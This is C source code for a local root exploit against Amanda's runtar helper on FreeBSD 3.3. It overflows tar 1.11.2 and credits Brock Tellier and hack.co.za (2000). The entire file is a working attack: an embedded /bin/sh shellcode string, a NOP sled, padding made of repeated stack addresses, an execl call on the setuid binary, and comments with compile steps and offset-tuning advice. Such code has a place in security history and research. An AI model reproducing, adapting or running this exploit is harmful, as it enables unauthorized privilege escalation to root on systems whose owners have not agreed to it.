/*
 * Amanda runtar exploit yields euid=0(root)
 * Actually overflows tar 1.11.2 (included in FreeBSD 3.3)
 * Tested on FreeBSD 3.3, modify shell/addr/dir for Amanda/tar on other
 * platforms
 *
 * Compile gcc -o amandax amandax.c
 * Run ./amandax <offset> <buflen>
 * keep buflen around 400, try positive and negative offsets
 *
 * Brock Tellier btellier@usa.net
 */


#include <stdlib.h>
#include <stdio.h>

char fbsdshell[]= /* mudge@lopht.com */
  "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
  "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
  "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
  "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";


#define LEN 400
#define NOP 0x90
#define ALIGN 3
#define OFFSET 0
#define ADDR 0xbfbfdd90 /* fbsd 3.3 */

int main(int argc, char *argv[])
{

  long int offset=OFFSET;

  int i;
  int buflen = LEN;
  long int addr = ADDR;
  char buf[LEN];

  if (argc > 1) offset = atoi(argv[1]);
  if (argc > 2) buflen = atoi(argv[2]);
  if (argc > 3)
    {
      fprintf(stderr, "Usage: %s <offset> <buflen>");
      exit(0);
    }

  fprintf(stderr, "Amanda runtar exploit for FreeBSD 3.3\n");
  fprintf(stderr, "Brock Tellier btellier@usa.net\n");
  fprintf(stderr, "Using addr: 0x%x\t buflen: %d\t offset: %d\n",
          addr+offset, buflen, offset);

  memset(buf,NOP,buflen);
  memcpy(buf+100,fbsdshell,strlen(fbsdshell));
  for(i= 100 + strlen(fbsdshell)+ALIGN;i<buflen-4;i+=4)*(int
        *)&buf[i]=addr+offset;

  execl("/usr/local/libexec/amanda/runtar", "runtar","cvf", buf, ":bah",
        NULL);

  exit(0);
}

/*                    www.hack.co.za              [2000]*/